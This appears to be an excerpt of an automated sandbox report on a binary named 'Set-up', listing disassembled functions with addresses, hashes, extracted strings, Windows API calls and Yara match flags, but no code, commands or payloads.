                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                  • Opcode ID: e8aa8b4561201d60a5efdcdfdbfa367fe20721bcb8b3029522f9d1ea03035a5b
                                                                                                                                                  • Instruction ID: d718745783e3cb463aa1acb90b86b9590feaef4db95924803e45ef075d9d51ce
                                                                                                                                                  • Opcode Fuzzy Hash: e8aa8b4561201d60a5efdcdfdbfa367fe20721bcb8b3029522f9d1ea03035a5b
                                                                                                                                                  • Instruction Fuzzy Hash: 3E21A1B2900308BEEB20DB95CC80EEBB7FCEF44344B10C42AF255E7690D235AD049B65
                                                                                                                                                  Function 00434C22 Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 1010COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: W
                                                                                                                                                  • API String ID: 3519838083-655174618
                                                                                                                                                  • Opcode ID: 4fdcc663f33c2bb8ae08789204201649e2f6217ce026bb4d3a4cfd124e4be867
                                                                                                                                                  • Instruction ID: 559c76734682755b776942833229c822618f41af8f5b274c9f563cb15ad09f6c
                                                                                                                                                  • Opcode Fuzzy Hash: 4fdcc663f33c2bb8ae08789204201649e2f6217ce026bb4d3a4cfd124e4be867
                                                                                                                                                  • Instruction Fuzzy Hash: 35926C70D04249DFDF15CFA8C594BAEBBB4BF48304F18409AE845AB382DB78AD45CB65
                                                                                                                                                  Function 00698B3B Relevance: 4.3, Strings: 3, Instructions: 503COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,y){$qU&W$qU&W
                                                                                                                                                  • API String ID: 0-3925510882
                                                                                                                                                  • Opcode ID: 58ec0d0f056e60a5121d26fa80f1a4fdae9498629de792f961f905ef0c2d1959
                                                                                                                                                  • Instruction ID: 12a81f70b3612e29a08cfe0cc3711502e0b4951a6ecdc80505e7ce4c718f848c
                                                                                                                                                  • Opcode Fuzzy Hash: 58ec0d0f056e60a5121d26fa80f1a4fdae9498629de792f961f905ef0c2d1959
                                                                                                                                                  • Instruction Fuzzy Hash: FDF165729083228BCB24CF24C4912ABB7F2FFA5354F19856DD8C45B3A5E7358D42C796
                                                                                                                                                  Function 0069E16D Relevance: 4.1, Strings: 3, Instructions: 332COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: -JH$C=|?$RP
                                                                                                                                                  • API String ID: 0-907785316
                                                                                                                                                  • Opcode ID: 8cf7f876c48ebd3e18f72044d9c598cbb11cdfb2f0e8d5ec215832c29b18f262
                                                                                                                                                  • Instruction ID: ac317cbc9f678aade5a7eec5a26e832c1f0a853f742ef02e6464ccd8dc153a74
                                                                                                                                                  • Opcode Fuzzy Hash: 8cf7f876c48ebd3e18f72044d9c598cbb11cdfb2f0e8d5ec215832c29b18f262
                                                                                                                                                  • Instruction Fuzzy Hash: 069126715083108BCB14DF28C8A26AB77F6EF96324F088A5CE4D68B7D1E735DA09C756
                                                                                                                                                  Function 006A3F1E Relevance: 4.1, Strings: 3, Instructions: 309COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: #D)J$'HIN$:\B
                                                                                                                                                  • API String ID: 0-3190177590
                                                                                                                                                  • Opcode ID: 56b848c57f425555c93d2ba29d93e1012366b44b596e5d4982ac7b6a83390f84
                                                                                                                                                  • Instruction ID: 5ed9664a9fa1dcf7435137d128af4a3d27c2bfd8df4bb8e88381a83a3b2fc6c9
                                                                                                                                                  • Opcode Fuzzy Hash: 56b848c57f425555c93d2ba29d93e1012366b44b596e5d4982ac7b6a83390f84
                                                                                                                                                  • Instruction Fuzzy Hash: 4791F3716043119BD724AF20CC92BAB77A2EFD2314F14852CE9958B381EBB9DD45CB92
                                                                                                                                                  Function 004462D0 Relevance: 4.0, Strings: 3, Instructions: 282COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorEventLastReset
                                                                                                                                                  • String ID: B$Z$h
                                                                                                                                                  • API String ID: 1621066496-418080759
                                                                                                                                                  • Opcode ID: 8eadb7a91652bfa944a640e96b3fc179b70d92505f1b071b0bfb99f77455d4ea
                                                                                                                                                  • Instruction ID: 0ee0f7fc007db7dcf2997cc137d959ccc1b6f66f856fc6053940abbb4799640b
                                                                                                                                                  • Opcode Fuzzy Hash: 8eadb7a91652bfa944a640e96b3fc179b70d92505f1b071b0bfb99f77455d4ea
                                                                                                                                                  • Instruction Fuzzy Hash: 32A1EA716047058BD724DF39C880AABB7E5AF85308F414D2FE59A87342DA39F909C75A
                                                                                                                                                  Function 0068FFFE Relevance: 3.9, Strings: 3, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: %$^$s
                                                                                                                                                  • API String ID: 0-3197480346
                                                                                                                                                  • Opcode ID: b2fa520abd1fa99fad6db686c14425d6a7504fb62f210934f4c32e56f529ce8f
                                                                                                                                                  • Instruction ID: 3db9c703bba5b0efac9b40e651524aa5ad877806ccead3f4dd5b03f547231587
                                                                                                                                                  • Opcode Fuzzy Hash: b2fa520abd1fa99fad6db686c14425d6a7504fb62f210934f4c32e56f529ce8f
                                                                                                                                                  • Instruction Fuzzy Hash: A3612A3290C7A04FEB249A3888112AFBBD66BC6760F194B3DDCE5D77C5D5388A42C742
                                                                                                                                                  Function 0040B61F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,00414029,?,?,004907E0), ref: 0040B629
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                  • String ID: )@A
                                                                                                                                                  • API String ID: 31276548-964663934
                                                                                                                                                  • Opcode ID: 6b6b034566826ebc9283fd6e4c36b993f8209ddfec5c274be0ff81ef8bf4a550
                                                                                                                                                  • Instruction ID: 59f4018fa932fe2eabc879f942c9d824a887892a3394e16cfb49e356fd9e0c66
                                                                                                                                                  • Opcode Fuzzy Hash: 6b6b034566826ebc9283fd6e4c36b993f8209ddfec5c274be0ff81ef8bf4a550
                                                                                                                                                  • Instruction Fuzzy Hash: FAC09B7490421D97CB00E7E5D94988F77FCE748105F400461D555E3140E670F9958795
                                                                                                                                                  Function 0069FA4E Relevance: 3.5, Strings: 2, Instructions: 967COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: N$|
                                                                                                                                                  • API String ID: 0-756983145
                                                                                                                                                  • Opcode ID: 76d2458fce463a1200e71a99e6c4a55d2164a21526f58a7e73da5fe15c7b42a4
                                                                                                                                                  • Instruction ID: 17e3fbaca881b04f1db986341dbacd4b1e6ba648e9dd7b454ec7d920d854ec45
                                                                                                                                                  • Opcode Fuzzy Hash: 76d2458fce463a1200e71a99e6c4a55d2164a21526f58a7e73da5fe15c7b42a4
                                                                                                                                                  • Instruction Fuzzy Hash: D062587550C3918FD725DF24C8907AEBBE2AF96310F184A6CE8D54B392D6358D0ACF92
                                                                                                                                                  Function 0068651E Relevance: 3.3, Strings: 2, Instructions: 796COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0$8
                                                                                                                                                  • API String ID: 0-46163386
                                                                                                                                                  • Opcode ID: 81d80e944959e083bf15ad58160060e60005621983e4b70c14e5cb8d3be6861a
                                                                                                                                                  • Instruction ID: a3d2c5f7cf71d0d293b67e3dd51211488a60f11c632110d230c0115a3f6a99e9
                                                                                                                                                  • Opcode Fuzzy Hash: 81d80e944959e083bf15ad58160060e60005621983e4b70c14e5cb8d3be6861a
                                                                                                                                                  • Instruction Fuzzy Hash: 3F7246715083409FD714DF18C884BABBBE2BF88314F148A2DF9898B391D775D958CBA2
                                                                                                                                                  Function 0046D354 Relevance: 3.1, APIs: 2, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersion.KERNEL32 ref: 0046D37A
                                                                                                                                                    • Part of subcall function 0046E5E6: HeapCreate.KERNEL32(00000000,00001000,00000000,0046D3B2,00000001), ref: 0046E5F7
                                                                                                                                                    • Part of subcall function 0046E5E6: HeapDestroy.KERNEL32 ref: 0046E636
                                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0046D3D9
                                                                                                                                                    • Part of subcall function 0046D469: ExitProcess.KERNEL32 ref: 0046D486
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1387771204-0
                                                                                                                                                  • Opcode ID: e656b266d4260b4ff18ad09f8e5a84f821897ab9df7f5e8d58a8cb81b0538a10
                                                                                                                                                  • Instruction ID: d75178d21a9ad8043be8486d7b5b0d6a43d48c7013b3882ba6fb75474c0e5f67
                                                                                                                                                  • Opcode Fuzzy Hash: e656b266d4260b4ff18ad09f8e5a84f821897ab9df7f5e8d58a8cb81b0538a10
                                                                                                                                                  • Instruction Fuzzy Hash: F621A1B0E40200AFEB09AF66DC0676A77A8EB15709F50403FF805973A1FA3D49408B5E
                                                                                                                                                  Function 0040B820 Relevance: 3.0, APIs: 2, Instructions: 15timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemTime.KERNEL32(?,?,?,00000000,00000000,004907E0), ref: 0040B82D
                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040B838
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$System$File
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2838179519-0
                                                                                                                                                  • Opcode ID: 8eb197beb2b384edb10e4f52f46dcea3cda7a3dd36a34a3b69b8ae55a48a6358
                                                                                                                                                  • Instruction ID: 771ab5c1123d3e6bd0a20603db53fc0c5b3be4b18b26dc4f71310ee56c531f31
                                                                                                                                                  • Opcode Fuzzy Hash: 8eb197beb2b384edb10e4f52f46dcea3cda7a3dd36a34a3b69b8ae55a48a6358
                                                                                                                                                  • Instruction Fuzzy Hash: 2ED0127280012DABDF00FBE8DC0ECEF7BBCF949114B840966A515D3041E6B0E915C7E5
                                                                                                                                                  Function 00685BEE Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: )$IEND
                                                                                                                                                  • API String ID: 0-707183367
                                                                                                                                                  • Opcode ID: 5be40a83e590b3ad905db483267d953d55a172221304e4b74163a420d5e896f5
                                                                                                                                                  • Instruction ID: ed64467ff55cfef50df94dbabae7d3e756f6b215f310ede25f8cd0a70ab39eb3
                                                                                                                                                  • Opcode Fuzzy Hash: 5be40a83e590b3ad905db483267d953d55a172221304e4b74163a420d5e896f5
                                                                                                                                                  • Instruction Fuzzy Hash: E8D1DFB19083449FD720EF24C841B9ABBE5EF94304F144A2DF99A9B381D775D908CF96
                                                                                                                                                  Function 0069AD9E Relevance: 2.8, Strings: 1, Instructions: 1564COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ()
                                                                                                                                                  • API String ID: 0-1580606521
                                                                                                                                                  • Opcode ID: 8727d8e0c9c1950316ae5dce8af273db3da0820350690cca7c4e99917d25aca6
                                                                                                                                                  • Instruction ID: 3e87f0aa3f0530e91881f7f22c4beb36a03e62912cdc4e4c309ddab6caf4345a
                                                                                                                                                  • Opcode Fuzzy Hash: 8727d8e0c9c1950316ae5dce8af273db3da0820350690cca7c4e99917d25aca6
                                                                                                                                                  • Instruction Fuzzy Hash: 3DA247726093009BDB24CB349D827ABBBD7FBD2324F29952CE59187791D7B1DC028B46
                                                                                                                                                  Function 0068F5BE Relevance: 2.8, Strings: 2, Instructions: 304COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: - !&$i
                                                                                                                                                  • API String ID: 0-720982556
                                                                                                                                                  • Opcode ID: 124137678305f0de057eb441684d7eea708a06d3e718c750c25a99a443d1c7bd
                                                                                                                                                  • Instruction ID: f248e508d235215ec07bedbb402ab5a1e26eff0ab97046d09915953083243267
                                                                                                                                                  • Opcode Fuzzy Hash: 124137678305f0de057eb441684d7eea708a06d3e718c750c25a99a443d1c7bd
                                                                                                                                                  • Instruction Fuzzy Hash: 7AA100B450C3D28AE3358F2594903EBBBE2AFA2304F184A6CD4C95B352D7394A46CB56
                                                                                                                                                  Function 0069D651 Relevance: 2.8, Strings: 2, Instructions: 304COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: /$bvlM
                                                                                                                                                  • API String ID: 0-1930407272
                                                                                                                                                  • Opcode ID: b5c72a53b7e059507d23fe8725458bce3b2582cee41e0d10917d18d9c409389c
                                                                                                                                                  • Instruction ID: 882820f68f3cac79fbffa7c4467fe84603ca12af74b7cd405d6d67a3188c76ff
                                                                                                                                                  • Opcode Fuzzy Hash: b5c72a53b7e059507d23fe8725458bce3b2582cee41e0d10917d18d9c409389c
                                                                                                                                                  • Instruction Fuzzy Hash: EB81FB756057814BDB2E8F3984A1672BFD3AFA7310B1C86ADC4D28F78AC739A406C750
                                                                                                                                                  Function 0069D2FA Relevance: 2.8, Strings: 2, Instructions: 302COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $vt$~|
                                                                                                                                                  • API String ID: 0-3628718825
                                                                                                                                                  • Opcode ID: d20c11543bd37ac65bf897c54a8009a7813f50d7f27ca523f33e0c6a90733d50
                                                                                                                                                  • Instruction ID: 39ef38749dea295b8cf6b38d1261913f26cae85be28de1de93f6790c5e82820d
                                                                                                                                                  • Opcode Fuzzy Hash: d20c11543bd37ac65bf897c54a8009a7813f50d7f27ca523f33e0c6a90733d50
                                                                                                                                                  • Instruction Fuzzy Hash: 1581E3756006018BDB39CF29C851673B7F2FF96315B29856DE496CBBA4E734E802CB50
                                                                                                                                                  Function 00696E2D Relevance: 2.8, Strings: 2, Instructions: 262COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 7$gfff
                                                                                                                                                  • API String ID: 0-3777064726
                                                                                                                                                  • Opcode ID: cac61846bff0d84e31c8c50a5d0a7fd862a71428ba2fa0b1147c2acee8d7a153
                                                                                                                                                  • Instruction ID: 7704d05fdd8de4bcdd07bed288647def3944ae244544c69cc201095e3c996f8a
                                                                                                                                                  • Opcode Fuzzy Hash: cac61846bff0d84e31c8c50a5d0a7fd862a71428ba2fa0b1147c2acee8d7a153
                                                                                                                                                  • Instruction Fuzzy Hash: 11816A72B186514BDB28CB39CC527AB76D7ABC5314F18C63EE091CB3D5EB7898068784
                                                                                                                                                  Function 006930A4 Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: [$h
                                                                                                                                                  • API String ID: 0-757665935
                                                                                                                                                  • Opcode ID: 2712f96876608c966d93383d06723276128173c21e3f836e6d415d7ea1f94672
                                                                                                                                                  • Instruction ID: 5cdd14d38a79e613b74db5e06dd45535327c6e61e87d710864099dc4bf0d89fc
                                                                                                                                                  • Opcode Fuzzy Hash: 2712f96876608c966d93383d06723276128173c21e3f836e6d415d7ea1f94672
                                                                                                                                                  • Instruction Fuzzy Hash: 6F91D77250C3A08BC764AF78C4453AEBBE66F85320F194B2DE4E9C37D1DA748A458B47
